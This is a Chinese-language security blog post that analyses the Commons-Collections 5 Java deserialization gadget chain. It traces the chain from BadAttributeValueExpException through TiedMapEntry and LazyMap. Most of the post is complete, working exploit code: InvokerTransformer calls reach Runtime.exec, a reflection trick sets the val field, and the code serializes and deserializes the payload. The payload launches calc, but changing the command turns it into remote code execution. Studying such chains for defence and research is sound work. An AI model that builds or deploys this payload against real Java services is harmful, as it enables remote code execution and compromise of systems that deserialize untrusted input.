Java安全-Commons-Collections 5利用链分析

环境

同CC1

CC5

链子分析

image-20250202145508986

CC6的链子中有个调试问题就是TiedMapEntrytoString方法会调用getValue方法

image-20250202141317321

getValue方法会调用LazyMapget方法

image-20250202141504686

在CC5中就是直接通过toString来走LazyMap这条链

然后就是找谁调用了TiedMapEntrytoString,yso的官方链子入口类是BadAttributeValueExpExceptionreadObject方法

image-20250202141923831

可以看到这里调用了toString,下面开始写Exp

构造Exp

先写toString后面的部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import org.apache.commons.collections.Transformer;
import java.util.HashMap;
import java.util.Map;

public class CC5Exp {
    public static void main(String[] args) {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object,Object> hashMap = new HashMap<>();
        Map lazyMap = LazyMap.decorate(hashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"p0l1st");
        tiedMapEntry.toString();
    }
}

image-20250202143617543

再加上入口类BadAttributeValueExpException

1
2
3
4
5
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("p0l1st");
Class c = Class.forName("javax.management.BadAttributeValueExpException");
Field field = c.getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException,tiedMapEntry);

这里因为BadAttributeValueExpException类的构造函数会调用toString方法,所以我们构造时需要先随便赋一个值,然后再通过反射修改回tiedMapEntry,这样才能够使得反序列化的时候调用TiedMapEntry

image-20250202144637899

Exp

最终Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import org.apache.commons.collections.Transformer;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;


public class CC5Exp {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException, IOException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object,Object> hashMap = new HashMap<>();
        Map lazyMap = LazyMap.decorate(hashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"p0l1st");
//        tiedMapEntry.toString();


        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("p0l1st");
        Class c = Class.forName("javax.management.BadAttributeValueExpException");
        Field field = c.getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException,tiedMapEntry);
        serialize(badAttributeValueExpException);
        unserialize("ser.bin");
 



    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

image-20250202144547815

参考文章

Java_Commons-Collections 5 (CC5)学习过程

Java反序列化Commons-Collections篇07-CC5链

About this Post

This post is written by p0l1st, licensed under CC BY-NC 4.0.

#Java安全